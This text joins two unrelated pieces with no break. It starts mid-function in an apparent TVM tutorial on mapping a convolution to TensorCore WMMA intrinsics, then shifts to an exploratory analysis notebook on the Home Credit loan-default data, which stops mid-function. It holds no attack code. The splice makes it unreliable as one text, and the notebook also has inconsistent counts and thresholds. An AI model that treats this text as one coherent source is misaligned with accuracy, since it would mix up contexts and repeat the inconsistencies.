data_alignment=32, offset_factor=256) def intrin_func(ins, outs): ib = tvm.tir.ir_builder.create() BA = ins[0] BC = outs[0] ib.emit( tvm.tir.call_intrin( "handle", "tir.tvm_load_matrix_sync", BC.data, n, n, n, BC.elem_offset // 256, BA.access_ptr("r"), n, "row_major", ) ) return ib.get() return te.decl_tensor_intrin(C.op, intrin_func, binds={A: BA, C: BC}) def intrin_wmma_gemm(): n = 16 A = te.placeholder((n, n), name="A", dtype="float16") B = te.placeholder((n, n), name="B", dtype="float16") k = te.reduce_axis((0, n), name="k") C = te.compute( (n, n), lambda ii, jj: te.sum(A[ii, k].astype("float") * B[k, jj].astype("float"), axis=k), name="C", ) BA = tvm.tir.decl_buffer( A.shape, A.dtype, name="BA", scope="wmma.matrix_a", data_alignment=32, offset_factor=256 ) BB = tvm.tir.decl_buffer( B.shape, B.dtype, name="BB", scope="wmma.matrix_b", data_alignment=32, offset_factor=256 ) BC = tvm.tir.decl_buffer( C.shape, C.dtype, name="BC", scope="wmma.accumulator", data_alignment=32, offset_factor=256 ) def intrin_func(ins, outs): BA, BB = ins (BC,) = outs def init(): ib = tvm.tir.ir_builder.create() ib.emit( tvm.tir.call_intrin( "handle", "tir.tvm_fill_fragment", BC.data, n, n, n, BC.elem_offset // 256, 0.0 ) ) return ib.get() def update(): ib = tvm.tir.ir_builder.create() ib.emit( tvm.tir.call_intrin( "handle", "tir.tvm_mma_sync", BC.data, BC.elem_offset // 256, BA.data, BA.elem_offset // 256, BB.data, BB.elem_offset // 256, BC.data, BC.elem_offset // 256, ) ) return ib.get() return update(), init(), update() return te.decl_tensor_intrin(C.op, intrin_func, binds={A: BA, B: BB, C: BC}) def intrin_wmma_store_matrix(): n = 16 A = te.placeholder((n, n), name="A", dtype="float32") BA = tvm.tir.decl_buffer( A.shape, A.dtype, scope="wmma.accumulator", data_alignment=32, offset_factor=256 ) C = te.compute((n, n), lambda i, j: A[i, j], name="C") BC = tvm.tir.decl_buffer(C.shape, C.dtype, scope="global", data_alignment=32, offset_factor=256) def intrin_func(ins, outs): ib = tvm.tir.ir_builder.create() BA = ins[0] BC = outs[0] ib.emit( tvm.tir.call_intrin( "handle", "tir.tvm_store_matrix_sync", BA.data, n, n, n, BA.elem_offset // 256, BC.access_ptr("w"), n, "row_major", ) ) return ib.get() return te.decl_tensor_intrin(C.op, intrin_func, binds={A: BA, C: BC})Scheduling the Computation--------------------------To use TensorCores in TVM, we must 
schedule the computation into specific structureto match the tensor intrinsic. The same as traditional GPU programs, we can also useshared memory to boost the speed. If you have any questions about blocking and sharedmemory, please refer `opt-conv-gpu`.In this example, each block contains 2x4 warps, and each warp calls 4x2 TensorCoreinstructions. Thus, the output shape of each warp is 64x32 and each block outputs128x128 titles. Due to the limit of shared memory space, we only load 2 blocks (2x128x128 tiles)one time.Note*Warp-level Operation* Note that all TensorCore instructions are warp-level instructions, which means all 32 threads in a warp should do this instruction simultaneously. Making theadIdx.x extent=32 is one of the easiest way to solve this. Then We can bind threadIdx.x to any loops except those contain TensorCore intrinsics directly or indirectly. Also note that it is not the unique solution. The only thing we should do is to make sure all threads in a warp can call TensorCore at the same time.# Define tiling sizes block_row_warps = 4 block_col_warps = 2 warp_row_tiles = 2 warp_col_tiles = 4 warp_size = 32 chunk = 2 block_x = te.thread_axis("blockIdx.x") block_y = te.thread_axis("blockIdx.y") block_z = te.thread_axis("blockIdx.z") thread_x = te.thread_axis("threadIdx.x") thread_y = te.thread_axis("threadIdx.y") thread_z = te.thread_axis("threadIdx.z") nc, hc, wc, oc, nnc, ooc = Conv.op.axis block_k = s[Conv].fuse(hc, wc) s[Conv].bind(block_k, block_z) nc, nci = s[Conv].split(nc, factor=warp_row_tiles) block_i, nc = s[Conv].split(nc, factor=block_row_warps) oc, oci = s[Conv].split(oc, factor=warp_col_tiles) block_j, oc = s[Conv].split(oc, factor=block_col_warps) s[Conv].reorder(block_k, block_i, block_j, nc, oc, nci, oci, nnc, ooc) s[Conv].bind(block_i, block_x) s[Conv].bind(block_j, block_y) s[Conv].bind(nc, thread_y) s[Conv].bind(oc, thread_z) # Schedule local computation s[ConvF].compute_at(s[Conv], oc) n, h, w, o, nnf, oof = ConvF.op.axis ko, ki = s[ConvF].split(ic, factor=chunk) s[ConvF].reorder(ko, kh, ki, kw, n, o, nnf, oof, ii) # Move intermediate computation into each output compute tile s[AF].compute_at(s[ConvF], kw) s[WF].compute_at(s[ConvF], kw) # Schedule for A's share memory s[AS].compute_at(s[ConvF], kh) n, h, w, i, nn, ii = AS.op.axis tx, xo = s[AS].split(n, nparts=block_row_warps) ty, yo = s[AS].split(xo, nparts=block_col_warps) t = s[AS].fuse(nn, ii) to, ti = s[AS].split(t, factor=warp_size) s[AS].bind(tx, thread_y) s[AS].bind(ty, thread_z) s[AS].bind(ti, thread_x) # Schedule for W's share memory s[WS].compute_at(s[ConvF], kh) kh, kw, ic, o, ii, oo = WS.op.axis tx, xo = s[WS].split(o, nparts=block_row_warps) ty, yo = s[WS].split(xo, nparts=block_col_warps) t = s[WS].fuse(ii, oo) to, ti = s[WS].split(t, nparts=warp_size) s[WS].bind(tx, thread_y) s[WS].bind(ty, thread_z) s[WS].bind(to, thread_x) s[WS].vectorize(ti) print(tvm.lower(s, [A, W, Conv], simple_mode=True))Lowering Computation to Intrinsics----------------------------------The last phase is to lower the computation loops down to TensorCore hardware intrinsicsby mapping the 2D convolution to tensor intrinsicss[AF].tensorize(AF.op.axis[-2], intrin_wmma_load_matrix("wmma.matrix_a")) s[WF].tensorize(WF.op.axis[-2], intrin_wmma_load_matrix("wmma.matrix_b")) s[Conv].tensorize(nnc, intrin_wmma_store_matrix()) s[ConvF].tensorize(nnf, intrin_wmma_gemm()) print(tvm.lower(s, [A, W, Conv], simple_mode=True))Generate CUDA Kernel--------------------Finally we use TVM to generate and compile the CUDA kernel, and 
evaluate the latency of convolution.Since TensorCores are only supported in NVIDIA GPU with Compute Capability 7.0 or higher, it may notbe able to run on our build serverdev = tvm.cuda(0) if nvcc.have_tensorcore(dev.compute_version): with tvm.transform.PassContext(config={"tir.UnrollLoop": {"auto_max_step": 16}}): func = tvm.build(s, [A, W, Conv], "cuda") a_np = np.random.uniform(size=data_shape).astype(A.dtype) w_np = np.random.uniform(size=kernel_shape).astype(W.dtype) a = tvm.nd.array(a_np, dev) w = tvm.nd.array(w_np, dev) c = tvm.nd.array(np.zeros(output_shape, dtype=Conv.dtype), dev) evaluator = func.time_evaluator(func.entry_name, dev, number=10) print("conv2d with tensor core: %f ms" % (evaluator(a, w, c).mean * 1e3))Contents- 1. Read dataset - 1.1. Read dataset - 1.2. Check null data - 1.3. Make meta dataframe- 2. EDA - application train - 2.1. Object feature - 2.1.1 Contract type - 2.1.2. Gender - 2.1.3. Do you have an own car? - 2.1.4. Do you have own realty? - 2.1.5. Suite type - 2.1.6. Income type - 2.1.7 Contract type - 2.1.8. 2.8 Family status - 2.1.9. Housing type - 2.1.10. Occupation type - 2.1.11. Process start (weekday) - 2.1.12. Organization type - 2.1.13. FONDKAPREMONT - 2.1.14. House type - 2.1.15. Wall material - 2.1.16. Emergency - 2.2. Int feature - 2.2.1 Count of children - 2.2.2. Mobil - 2.2.3. EMP Phone - 2.2.4. Work phone - 2.2.5. Cont mobile - 2.2.6. Phone - 2.2.7 Region Rating Client - 2.2.8. Region Rating Client With City - 2.2.9. Hour Appr Process Start - 2.2.10. Register region and not live region - 2.2.11. Register region and not work region - 2.2.12. Live region and not work region - 2.2.13. Register city and not live city - 2.2.14. Register city and not work city - 2.2.15. Live city and not work city - 2.2.16. Heatmap for int features - 2.2.17. More analysis for int features which have correlation with target - 2.2.18. linear regression analysis on the high correlated feature combinations - 3. EDA - Bureau - 3.1. Read and check data - 3.2. Merge with application_train - 3.3. Analysis on object feature - 3.3.1. Credit active - 3.3.2. Credit currency - 3.3.3. Credit type - 3.4. Analysis on int feature - 3.4.1. Credit day - 3.4.2. Credit day overdue - 3.4.3. Credit day prolong - 3.5. Analysis on float feature - 3.5.1 Amount credit sum - 3.5.2 Amount credit sum debt - 3.5.3 Amount credit sum limit - 3.5.4 Amount credit sum overdue 1. Read dataset 1.1. Read datasetapplication_train = pd.read_csv('../input/application_train.csv') # POS_CASH_balance = pd.read_csv('../input/POS_CASH_balance.csv') bureau_balance = pd.read_csv('../input/bureau_balance.csv') previous_application = pd.read_csv('../input/previous_application.csv') # installments_payments = pd.read_csv('../input/installments_payments.csv') # credit_card_balance = pd.read_csv('../input/credit_card_balance.csv') # bureau = pd.read_csv('../input/bureau.csv') # application_test = pd.read_csv('../input/application_test.csv') print('Size of application_tra data', application_train.shape) # print('Size of POS_CASH_balance data', POS_CASH_balance.shape) # print('Size of bureau_balance data', bureau_balance.shape) # print('Size of previous_application data', previous_application.shape) # print('Size of installments payments data', installments_payments.shape) # print('Size of credit_card_balance data', credit_card_balance.shape) # print('Size of bureau data', bureau.shape) application_train.head()1.2. Check null data - With msno library, we could see the blanks in the dataset. 
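The `msno` calls in the next cell assume the library was imported earlier in the notebook (the import is not visible in this excerpt); a minimal sketch of the conventional import:

```python
# missingno is conventionally imported under the msno alias; msno.matrix() then
# renders the nullity matrix used below (msno.bar() is a per-column alternative).
import missingno as msno
```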
Check null data in application train.msno.matrix(df=application_train, figsize=(10, 8), color=(0, 0.6, 1)) # checking missing data total = application_train.isnull().sum().sort_values(ascending = False) percent = (application_train.isnull().sum()/application_train.isnull().count()*100).sort_values(ascending = False) missing_application_train_data = pd.concat([total, percent], axis=1, keys=['Total', 'Percent']) missing_application_train_data.head(20)1.3. Make meta dataframeapplication_train.info()- There are 3 data types(float64, int64, object) in application_train dataframe. - Before starting EDA, It would be useful to make meta dataframe which include the information of dtype, level, response rate and role of each features.def make_meta_dataframe(df): data = [] for col in df.columns: if col == 'TARGET': role = 'target' elif col == 'SK_ID_CURR': role = 'id' else: role = 'input' if df[col].dtype == 'float64': level = 'interval' elif df[col].dtype == 'int64': level = 'ordinal' elif df[col].dtype == 'object': level = 'categorical' col_dict = { 'varname': col, 'role': role, 'level': level, 'dtype': df[col].dtype, 'response_rate': 100 * df[col].notnull().sum() / df.shape[0] } data.append(col_dict) meta = pd.DataFrame(data, columns=['varname', 'role', 'level', 'dtype', 'response_rate']) meta.set_index('varname', inplace=True) return meta meta = make_meta_dataframe(application_train)1.4. Check imbalance of target - Checking the imbalance of dataset is important. If imbalanced, we need to select more technical strategy to make a model.def random_color_generator(number_of_colors): color = ["#"+''.join([random.choice('0123456789ABCDEF') for j in range(6)]) for i in range(number_of_colors)] return color cnt_srs = application_train['TARGET'].value_counts() text = ['{:.2f}%'.format(100 * (value / cnt_srs.sum())) for value in cnt_srs.values] trace = go.Bar( x = cnt_srs.index, y = (cnt_srs / cnt_srs.sum()) * 100, marker = dict( color = random_color_generator(2), line = dict(color='rgb(8, 48, 107)', width = 1.5 ) ), opacity = 0.7 ) data = [trace] layout = go.Layout( title = 'Target distribution(%)', margin = dict( l = 100 ), xaxis = dict( title = 'Labels (0: repay, 1: not repay)' ), yaxis = dict( title = 'Account(%)' ), width=800, height=500 ) annotations = [] for i in range(2): annotations.append(dict( x = cnt_srs.index[i], y = ((cnt_srs / cnt_srs.sum()) * 100)[i], text = text[i], font = dict( family = 'Arial', size = 14, ), showarrow = True )) layout['annotations'] = annotations fig = go.Figure(data=data, layout=layout) py.iplot(fig)- As you can see, target is imbalanced.- This fact makes this competition diffcult to solve. But, no pain, no gain. After this competition, we could learn many things! Enjoy! 2. EDA - application_train 2.1. Object feature - I want to draw two count bar plot for each object and int features. 
One contain the each count of responses and other contain the percent on target.def get_percent(df, temp_col, width=800, height=500): cnt_srs = df[[temp_col, 'TARGET']].groupby([temp_col], as_index=False).mean().sort_values(by=temp_col) trace = go.Bar( x = cnt_srs[temp_col].values[::-1], y = cnt_srs['TARGET'].values[::-1], text = cnt_srs.values[::-1], textposition = 'auto', textfont = dict( size=12, color='rgb(0, 0, 0)' ), orientation = 'v', marker = dict( color = random_color_generator(100), line=dict(color='rgb(8,48,107)', width=1.5,) ), opacity = 0.7, ) return trace # fig = go.Figure(data=data, layout=layout) # py.iplot(fig) def get_count(df, temp_col, width=800, height=500): cnt_srs = df[temp_col].value_counts().sort_index() trace = go.Bar( x = cnt_srs.index[::-1], y = cnt_srs.values[::-1], text = cnt_srs.values[::-1], textposition = 'auto', textfont = dict( size=12, color='rgb(0, 0, 0)' ), name = 'Percent', orientation = 'v', marker = dict( color = random_color_generator(100), line=dict(color='rgb(8,48,107)', width=1.5,) ), opacity = 0.7, ) return trace # fig = go.Figure(data=data, layout=layout) # py.iplot(fig) def plot_count_percent_for_object(df, temp_col, height=500): trace1 = get_count(df, temp_col) trace2 = get_percent(df, temp_col) fig = tools.make_subplots(rows=1, cols=2, subplot_titles=('Count', 'Percent'), print_grid=False) fig.append_trace(trace1, 1, 1) fig.append_trace(trace2, 1, 2) fig['layout']['yaxis1'].update(title='Count') fig['layout']['yaxis2'].update(range=[0, 1], title='% TARGET') fig['layout'].update(title='{} (Response rate: {:.2f}%)'.format(temp_col, meta[(meta.index == temp_col)]['response_rate'].values[0]), margin=dict(l=100), width=800, height=height, showlegend=False) py.iplot(fig) features_dtype_object = meta[meta['dtype'] == 'object'].index features_dtype_int = meta[meta['dtype'] == 'int64'].index features_dtype_float = meta[meta['dtype'] == 'float64'].index- Sometimes, null data itself can be important feature. So, I want to compare the change when using null data as feature and not using nulll data as feature.application_object_na_filled = application_train[features_dtype_object].fillna('null') application_object_na_filled['TARGET'] = application_train['TARGET']2.1.1. Contract type **REMIND: repay == 0 and not repay == 1**temp_col = features_dtype_object[0] plot_count_percent_for_object(application_train, temp_col)- Most contract type of clients is Cash loans. - Not repayment rate is higher in cash loans (~8%) than in revolving loans(~5%). 2.1.2. Gendertemp_col = features_dtype_object[1] plot_count_percent_for_object(application_train, temp_col)- The number of female clients is almoist double the number of male clients.- Males have a higher chance of not returning their loans (~10%), comparing with women(~7%). 2.1.3. Do you have an own car?temp_col = features_dtype_object[2] plot_count_percent_for_object(application_train, temp_col)- The clients that owns a car are higher than no-car clients by a factor of two times. - The Not-repayment percent is similar. (Own: ~7%, Not-own: ~8%) 2.1.4. Do you have own realty?temp_col = features_dtype_object[3] plot_count_percent_for_object(application_train, temp_col)- T he clients that owns a realty almost a half of the ones that doesn't own realty. - Both categories have not-repayment rate, about ~8%. 2.1.5. 
Suite typetemp_col = features_dtype_object[4] plot_count_percent_for_object(application_train, temp_col) plot_count_percent_for_object(application_object_na_filled, temp_col)- Most suite type of clients are 'Unaccompanied', followed by Family, Spouse, children.- When considering null data, there is no change the order.- Other_B and Other_A have higher not-repayment rate than others. 2.1.6. Income typetemp_col = features_dtype_object[5] plot_count_percent_for_object(application_train, temp_col)- Most of the clients get income from working. - The number of Student, Unemployed, Bussnessman and Maternity leave are very few.- When unemployed and maternity leave, there is high probability of not-repayment. 2.1.7. Education typetemp_col = features_dtype_object[6] plot_count_percent_for_object(application_train, temp_col)- Clients with secondary education type are most numerous, followed by higher education, incomplete higher.- Clients with Lower secondary have the highest not-repayment rate(~10%). 2.1.8. Family statustemp_col = features_dtype_object[7] plot_count_percent_for_object(application_train, temp_col)- Most of clients for loans are married followed by single/not married, civial marriage.- Civil marriage have almost 10% ratio of not returning loans followed by single/notmarried(9.9%), separate(8%). 2.1.9. Housing typetemp_col = features_dtype_object[8] plot_count_percent_for_object(application_train, temp_col)- Clients with house/apartment are most numerous, followed by With parents, Municipal apartment.- When Rented apartment and live with parents, clients have somewhat high not-repayment ratio. (~12%) 2.1.10. Occupation typetemp_col = features_dtype_object[9] plot_count_percent_for_object(application_train, temp_col) plot_count_percent_for_object(application_object_na_filled, temp_col)- When not considering null data, Majority of clients are laborers, sales staff, core staff, drivers. But with considering null data, null data(I think it would be 'not want to repond' or 'no job', 'not in category') are most numerous.- However, not-repayment rate is low for null data. Low-skill labor is the most high not-repayment rate (~17%) in both plot. 2.1.11. Process start (weekday)temp_col = features_dtype_object[10] plot_count_percent_for_object(application_train, temp_col)- The number of process for weekend is less than other days. That's because Weekend is weekend.- There are no big changes between not-repayment rate of all days.- Day is not important factor for repayment. 2.1.12. Organization typetemp_col = features_dtype_object[11] plot_count_percent_for_object(application_train, temp_col)- The most frequent case of organization is Bussiness Entity Type 3 followed XNA and self-employ.- The Transport: type 3 has the highest not repayment rate(~16%), Industry: type 13(~13.5%). 2.1.13. FONDKAPREMONTtemp_col = features_dtype_object[12] plot_count_percent_for_object(application_train, temp_col) plot_count_percent_for_object(application_object_na_filled, temp_col)- Actually, I don't know exact meaning of this feature FONDKAPREMONT_MODE.- Anyway, when considering null data, nul data has the highest count and not-repayment rate. 2.1.14. House typetemp_col = features_dtype_object[13] plot_count_percent_for_object(application_train, temp_col) plot_count_percent_for_object(application_object_na_filled, temp_col)- When considering null data, null data and block of flats are two-top. - But, specific housing and terraced house have higher not-repayment rate than block of flats. 
- null data has the highest not-repayment rate(~9%). 2.1.15. Wall materialtemp_col = features_dtype_object[14] plot_count_percent_for_object(application_train, temp_col) plot_count_percent_for_object(application_object_na_filled, temp_col)- There are over 150,000 null data for WALLSMATERIAL_MODE. - Clients with Wooden have higher than 9% not repayment rate. 2.1.16. Emergencytemp_col = features_dtype_object[15] plot_count_percent_for_object(application_train, temp_col) plot_count_percent_for_object(application_object_na_filled, temp_col)- For emergency state, there is also many null data. - If clients is in an emergency state, not-repayment rate(~10%) is higher than not in an emergency state.- null is also high not-repayment rate(~-10%). 2.2. Int feature - Let's do similar analysis for int features.def plot_count_percent_for_int(df, temp_col, height=500): trace1 = get_count(df, temp_col) trace2 = get_percent(df, temp_col) fig = tools.make_subplots(rows=1, cols=2, subplot_titles=('Count', 'Percent'), print_grid=False) fig.append_trace(trace1, 1, 1) fig.append_trace(trace2, 1, 2) fig['layout']['xaxis1'].update(tickvals=[i for i in range(20)]) fig['layout']['xaxis2'].update(tickvals=[i for i in range(20)]) fig['layout']['yaxis1'].update(title='Count') fig['layout']['yaxis2'].update(range=[0, 1], title='% TARGET') fig['layout'].update(title='{} (Response rate: {:.2f}%)'.format(temp_col, meta[(meta.index == temp_col)]['response_rate'].values[0]), margin=dict(l=100), width=800, height=height, showlegend=False) py.iplot(fig) application_train_int = application_train[meta[meta['dtype'] == 'int64'].index] application_train_int['TARGET'] = application_train['TARGET']2.2.1. Count of childrenfeatures_dtype_int temp_col = features_dtype_int[2] plot_count_percent_for_int(application_train_int, temp_col)- Most clients with no children requested loan. - Clients with 9, 11 have 100% not-repayment rate. the each count of those cases is 2 and 1.- Except 9, 11, Clients with 6 children has high not-repayment rate. 2.2.2. Mobiltemp_col = features_dtype_int[6] plot_count_percent_for_int(application_train_int, temp_col)- There are no clients without mobil(maybe mobile). 2.2.3. EMP Phonetemp_col = features_dtype_int[7] plot_count_percent_for_int(application_train, temp_col)- Most clients(82%) have EPM Phone.- The gap between the not-repayment percent is about 3%. 2.2.3. Work Phonetemp_col = features_dtype_int[8] plot_count_percent_for_int(application_train, temp_col)- Most clients(80%) don't have work phone. 2.2.5. Cont mobiletemp_col = features_dtype_int[9] plot_count_percent_for_int(application_train, temp_col)- Clients who chose 'no' for CONT_MOBILE FALG is very few.(574) 2.2.6. Phonetemp_col = features_dtype_int[10] plot_count_percent_for_int(application_train, temp_col)- Most clients(72%) don't have work phone. 2.2.7. Region Rating Clienttemp_col = features_dtype_int[12] plot_count_percent_for_int(application_train, temp_col)- Clients who chose 2 for REGION_RATING_CLIENT is numerous, followed by 3, 1.- For not-repayment, the order is 3, 2, 1. 2.2.8. Region Rating Client With Citytemp_col = features_dtype_int[13] plot_count_percent_for_int(application_train, temp_col)- Clients who chose 2 for REGION_RATING_CLIENT with city is numerous, followed by 3, 1.- For not-repayment, the order is 3, 2, 1. 2.2.9. Hour Appr Process Starttemp_col = features_dtype_int[14] plot_count_percent_for_int(application_train, temp_col)- The most busy hour for Appr Process Start is a range from 10:00 to 13:00. 2.2.10. 
Register region and not live regiontemp_col = features_dtype_int[15] plot_count_percent_for_int(application_train, temp_col)- 98.5% of clients registered their region but not live in the region. 2.2.11. Register region and not work regiontemp_col = features_dtype_int[16] plot_count_percent_for_int(application_train, temp_col)- 95% of clients registered their region but not work in the region. 2.2.12. Live region and not work regiontemp_col = features_dtype_int[17] plot_count_percent_for_int(application_train, temp_col)- 95.9% of clients lives in their region but don't work in the region. - For 3 questions about region(10, 11, 12), the not-repayment percent is similar for each case. 2.2.13. Register city and not live citytemp_col = features_dtype_int[18] plot_count_percent_for_int(application_train, temp_col)- 92.1% of clients registered city and don't live in the city.- Unlike region, city could be good information. Because the difference of the not-repayment percent between 'yes' and 'no' is higher than region case(2.2.10, 2.2.11, 2.2.12) 2.2.14. Register city and not work citytemp_col = features_dtype_int[19] plot_count_percent_for_int(application_train, temp_col)- 78% of clients registered city and don't work in the city.- If client is this case, the not-repayment rate is about 10%. 2.2.15. Live city and not work citytemp_col = features_dtype_int[20] plot_count_percent_for_int(application_train, temp_col)- 82% of clients registered city and don't work in the city.- If client is this case, the not-repayment rate is about 10%. 2.2.16. Flag documentfor i in range(21, 40): temp_col = features_dtype_int[i] plot_count_percent_for_int(application_train, temp_col)- Document 2: 13 clients chose 1 and not-repayment rate is high, about 30%.- Document 4: 25 clients chose 1 and not-repayment rate is 0. all the clients who chose 1 repaid.- Document 10: 7 clients chose 1 and not-repayment rate is 0. all the clients who chose 1 repaid.- Document 12: 2 clients chose 1 and not-repayment rate is 0. all the clients who chose 1 repaid. 2.2.16. Heatmap for int features - Let's see the correlations between the int features. Heatmap helps us to see this easily.data = [ go.Heatmap( z = application_train_int.corr().values, x = application_train_int.columns.values, y = application_train_int.columns.values, colorscale='Viridis', reversescale = False, text = True , ) ] layout = go.Layout( title='Pearson Correlation of float-type features', xaxis = dict(ticks=''), yaxis = dict(ticks='' ), width = 900, height = 700, margin = dict( l = 250 ) ) fig = go.Figure(data=data, layout=layout) py.iplot(fig, filename='labelled-heatmap')- There are some combinations with high correlation coefficient.- FLAG_DOCUMENT_6 and FLAG_EMP_PHONE- DAYS_BIRTH and FLAG_EMP_PHONE- DAYS_EMPLOYED and FLAG_EMP_PHONE- In follow section, we will look those features more deeply using linear regression plot with seaborn. 2.2.17. 
More analysis for int features which have correlation with target - At first, find the int features which have high correlation with target.correlations = application_train_int.corr()['TARGET'].sort_values() correlations[correlations.abs() > 0.05]- DAYS_BIRTH is some high correlation with target.- With dividing 365(year) and applying abs(), we can see DAYS_BIRTH in the unit of year(AGE).temp_col = 'DAYS_BIRTH' sns.kdeplot((application_train_int.loc[application_train_int['TARGET'] == 0, temp_col]/365).abs(), label='repay(0)', color='r') sns.kdeplot((application_train_int.loc[application_train_int['TARGET'] == 1, temp_col]/365).abs(), label='not repay(1)', color='b') plt.xlabel('Age(years)') plt.title('KDE for {} splitted by target'.format(temp_col)) plt.show()- As you can see, The younger, The higher not-repayment probability.- The older, The lower not-repayment probability. 2.2.18. linear regression analysis on the high correlated feature combinations - With lmplot from seaborn, we can draw linear regression plot very easily. Thanks!sns.lmplot(x='FLAG_DOCUMENT_6', y='FLAG_EMP_PHONE', data=application_train_int) col1 = 'FLAG_DOCUMENT_6' col2 = 'FLAG_EMP_PHONE' xy = np.vstack([application_train[col1].dropna().values[:100000], application_train[col2].dropna().values[:100000]]) z = gaussian_kde(xy)(xy) fig, ax = plt.subplots(1, 1, figsize=(10, 10)) im = ax.scatter(application_train[col1].dropna().values[:100000], application_train[col2].dropna().values[:100000], c=z, s=50, cmap=plt.cm.jet) ax.set_xlabel(col1) ax.set_ylabel(col2) fig.colorbar(im)- With gaussian kde density represented by color and linear regression plot, we can see that there are many clients who have EMP Phone and chose document 6.sns.lmplot(x='DAYS_BIRTH', y='FLAG_EMP_PHONE', data=application_train_int) col1 = 'DAYS_BIRTH' col2 = 'FLAG_EMP_PHONE' xy = np.vstack([np.abs((application_train[col1].dropna().values[:100000]/365)), application_train[col2].dropna().values[:100000]]) z = gaussian_kde(xy)(xy) fig, ax = plt.subplots(1, 1, figsize=(8, 8)) im = ax.scatter(np.abs((application_train[col1].dropna().values[:100000]/365)), application_train[col2].dropna().values[:100000], c=z, s=50, cmap=plt.cm.jet) ax.set_xlabel(col1) ax.set_ylabel(col2) fig.colorbar(im)- With gaussian kde density represented by color and linear regression plot, we can see that the younger people tend to have EMP phone.sns.lmplot(x='DAYS_EMPLOYED', y='FLAG_EMP_PHONE', data=application_train_int.dropna().loc[:100000, :]) col1 = 'DAYS_EMPLOYED' col2 = 'FLAG_EMP_PHONE' xy = np.vstack([np.abs((application_train[col1].dropna().values[:100000]/365)), application_train[col2].dropna().values[:100000]]) z = gaussian_kde(xy)(xy) fig, ax = plt.subplots(1, 1, figsize=(8, 8)) im = ax.scatter(np.abs((application_train[col1].dropna().values[:100000]/365)), application_train[col2].dropna().values[:100000], c=z, s=50, cmap=plt.cm.jet) ax.set_xlabel(col1) ax.set_ylabel(col2) fig.colorbar(im)- With gaussian kde density represented by color and linear regression plot, we can see that clients with shorter employed tend to have EMP phone. (simiar result compared to FLAG_EMP_PHONE vs DAYS_BIRTH) 2.3. float feature - Let's move on float features. 2.3.1. 
Heatmap for float features - Let us draw the heatmap of float features.application_train_float = application_train[meta[meta['dtype'] == 'float64'].index] application_train_float['TARGET'] = application_train['TARGET'] data = [ go.Heatmap( z = application_train_float.corr().values, x = application_train_float.columns.values, y = application_train_float.columns.values, colorscale='Viridis', reversescale = False, text = True , ) ] layout = go.Layout( title='Pearson Correlation of float-type features', xaxis = dict(ticks=''), yaxis = dict(ticks='' ), width = 1200, height = 1200, margin = dict( l = 250 ) ) fig = go.Figure(data=data, layout=layout) py.iplot(fig, filename='labelled-heatmap')- There are some features which have some high correlation with target. In follow section, we will find them and analyze them.- There are many feature combinations which have high correlation value(larger than 0.9).- Let's find the combinations. 2.3.2. More analysis for int features which have correlation with target - Let's find the float features which are highly correlated with target.correlations = application_train_float.corr()['TARGET'].sort_values() correlations[correlations.abs() > 0.05] temp_col = 'EXT_SOURCE_1' sns.kdeplot(application_train_float.loc[application_train_float['TARGET'] == 0, temp_col], label='repay(0)', color='r') sns.kdeplot(application_train_float.loc[application_train_float['TARGET'] == 1, temp_col], label='not repay(1)', color='b') plt.title('KDE for {} splitted by target'.format(temp_col)) plt.show()- The simple kde plot(kernel density estimation plot) shows that the distribution of repay and not-repay is different for EXT_SOURCE_1.- EXT_SOURCE_1 can be good feature.temp_col = 'EXT_SOURCE_2' sns.kdeplot(application_train_float.loc[application_train_float['TARGET'] == 0, temp_col], label='repay(0)', color='r') sns.kdeplot(application_train_float.loc[application_train_float['TARGET'] == 1, temp_col], label='not repay(1)', color='b') plt.title('KDE for {} splitted by target'.format(temp_col)) plt.show()- Not as much as EXT_SOURCE_1 do, EXT_SOURCE_2 shows different distribution for each repay and not-repay.temp_col = 'EXT_SOURCE_3' sns.kdeplot(application_train_float.loc[application_train_float['TARGET'] == 0, temp_col], label='repay(0)', color='r') sns.kdeplot(application_train_float.loc[application_train_float['TARGET'] == 1, temp_col], label='not repay(1)', color='b') plt.title('KDE for {} splitted by target'.format(temp_col)) plt.show()- EXX_SOUCE_3 has similar trend with EXT_SOURCE_1.- EXT_SOURCE_3 can be good feature. 2.3.3. 
linear regression analysis on the high correlated feature combinations - Using corr() and numpy boolean technique with triu(), we could obtain the correlation matrix without replicates.corr_matrix = application_train_float.corr().abs() corr_matrix.head() upper = corr_matrix.where(np.triu(np.ones(corr_matrix.shape), k=1).astype(np.bool)) upper.head() threshold = 0.9 count = 1 combinations = [] for name, column in upper.iteritems(): if (column > threshold).any(): for col, value in column[column > 0.9].iteritems(): print(count, name, col, value) combinations.append((name, col, value)) count += 1- There are 60 combinations which have larger correlation values than 0.95.- Let's draw the regplot for all combinations with splitting the target.fig, ax = plt.subplots(28, 2, figsize=(20, 400)) count = 0 for i in range(28): for j in range(2): sns.regplot(x=combinations[count][0], y=combinations[count][1], data=application_train_float[application_train_float['TARGET'] == 0], ax=ax[i][j], color='r') sns.regplot(x=combinations[count][0], y=combinations[count][1], data=application_train_float[application_train_float['TARGET'] == 1], ax=ax[i][j], color='b') ax[i][j].set_title('{} and {}, corr:{:.2f} '.format(combinations[count][0], combinations[count][1], combinations[count][2])) ax[i][j].legend(['repay', 'not repay'], loc=0) count += 1- After looking these 56 plots, I found som combinations in which the distribution for repay and not-repay is a bit different.- Let's see this with single and multi variable kde plot.- It is nice to use log-operation on features. With log-operation, we can analyze the distribution more easily.def multi_features_kde_plot(col1, col2): fig, ax = plt.subplots(3, 2, figsize=(14, 20)) g = sns.kdeplot(application_train_float.loc[application_train['TARGET'] == 0, :].dropna().loc[:50000, :][col1], application_train_float.loc[application_train['TARGET'] == 0, :].dropna().loc[:50000, :][col2], ax=ax[0][0], cmap="Reds") g = sns.kdeplot(application_train_float.loc[application_train['TARGET'] == 1, :].dropna().loc[:50000, :][col1], application_train_float.loc[application_train['TARGET'] == 1, :].dropna().loc[:50000, :][col2], ax=ax[0][1], cmap='Blues') ax[0][0].set_title('mutivariate KDE: target == repay') ax[0][1].set_title('mutivariate KDE: target == not repay') temp_col = col1 sns.kdeplot(application_train.loc[application_train['TARGET'] == 0, temp_col].dropna(), label='repay(0)', color='r', ax=ax[1][0]) sns.kdeplot(application_train.loc[application_train['TARGET'] == 1, temp_col].dropna(), label='not repay(1)', color='b', ax=ax[1][0]) ax[1][0].set_title('KDE for {}'.format(temp_col)) sns.kdeplot(np.log(application_train.loc[(application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[1][1]) sns.kdeplot(np.log(application_train.loc[(application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[1][1]) 